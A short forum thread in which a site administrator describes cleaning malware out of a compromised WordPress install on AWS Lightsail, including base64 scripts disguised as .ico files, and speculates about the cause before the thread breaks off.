suck-o.com

client site on AWS Lightsail, standard Wordpress install. curious if the server instance was rooted...

As the kids would say these days. "big ooof bro!" .

Guess you've got some cleanup to do?

ayu wrote: ↑

13 Feb 2022, 07:02

Guess you've got some cleanup to do?

yep! got most of it done, until the site is live and traffic rolls in (right now I access it through HOSTS file) you never know if you found everything.
there were plenty of the usual base64 script crap disguised as .ico, luckily they all used the same unusual name pattern so I could easily find them all by running a search for .*.ico:
https://code.suck-o.com/?c67218b44679ef ... rFG95Bekvx

deleted everything else except for the uploads and replaced it with newly downloaded plugins. I'm sure there's still some crap left in the uploads, but those are hundreds of folders with thousands of images, so I rather let it go live and then check the logs for POST requests....basically I let potential attackers do my work...

Good job
Do you know how it happened? Probably some wordpress plugin that had a backdoor or was unpatched?

ph0bYx wrote: ↑

25 Feb 2022, 04:48

Good job
Do you know how it happened? Probably some wordpress plugin that had a backdoor or was unpatched?

hard to say what exactly caused it, the site ran that way for a long time already.....but yeah this might have played a role: